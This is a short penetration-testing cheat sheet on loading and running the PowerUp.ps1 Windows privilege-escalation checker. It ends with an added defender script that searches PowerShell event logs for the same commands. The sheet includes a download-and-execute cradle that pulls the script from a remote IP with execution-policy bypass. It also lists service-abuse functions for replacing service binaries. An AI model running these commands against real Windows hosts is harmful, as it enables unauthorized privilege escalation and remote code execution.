>_ shadow.red

PowerUp.ps1 - Windows PrivEsc Checks


In-memory load and run

powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.228/PowerUp.ps1');Invoke-AllChecks

From an SMB share

powershell -ep bypass . \\TSCLIENT\share\PowerUp.ps1;Invoke-AllChecks

Local invocation

powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks
Invoke-AllChecks > up.log
Get-Help Invoke-ServiceAbuse -Examples

From cmd, save output

powershell -nop -ep bypass . .\PowerUp.ps1;Invoke-AllChecks > up.log

Useful functions

Get-ModifiableServiceFile
Get-UnquotedService
Install-ServiceBinary
Write-ServiceBinary
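Defender side of the commands above, as an added example that is not part of this page or of the PowerUp project: a script that searches PowerShell script block logs (Event ID 4104 in Microsoft-Windows-PowerShell/Operational) for the download cradle and the function names listed here. It assumes script block logging is enabled on the reviewed host; the lookback window and computer name are assumed parameters.

```powershell
# Added example (not from the shadow.red page or PowerUp): hunt for PowerUp
# loading and execution in PowerShell script block logs (Event ID 4104).
# Assumes script block logging is enabled and the caller can read the log.
$patterns = @(
    'Invoke-AllChecks',
    'Get-ModifiableServiceFile',
    'Get-UnquotedService',
    'Install-ServiceBinary',
    'Write-ServiceBinary',
    'Invoke-ServiceAbuse',
    'PowerUp\.ps1',
    'Net\.WebClient\)\.DownloadString\('   # in-memory load cradle used above
)
$regex = $patterns -join '|'

function Find-PowerUpActivity {
    param(
        [datetime]$Since = (Get-Date).AddDays(-7),      # assumed lookback window
        [string]$ComputerName = $env:COMPUTERNAME       # assumed target host
    )
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = $Since
    }
    Get-WinEvent -FilterHashtable $filter -ComputerName $ComputerName -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Property index 2 of a 4104 event holds the ScriptBlockText
            $text = [string]$_.Properties[2].Value
            if ($text -match $regex) {
                # Collapse whitespace so the snippet fits on one report line
                $flat = $text -replace '\s+', ' '
                [pscustomobject]@{
                    Time     = $_.TimeCreated
                    Computer = $_.MachineName
                    User     = $_.UserId
                    Match    = $Matches[0]
                    Snippet  = $flat.Substring(0, [Math]::Min(120, $flat.Length))
                }
            }
        }
}

# Report matches in chronological order; an empty table means no hits in the window
Find-PowerUpActivity | Sort-Object Time | Format-Table -AutoSize
```

The `DownloadString(` pattern also matches legitimate cradles, so triage hits by the `Match` column and the user context before escalating.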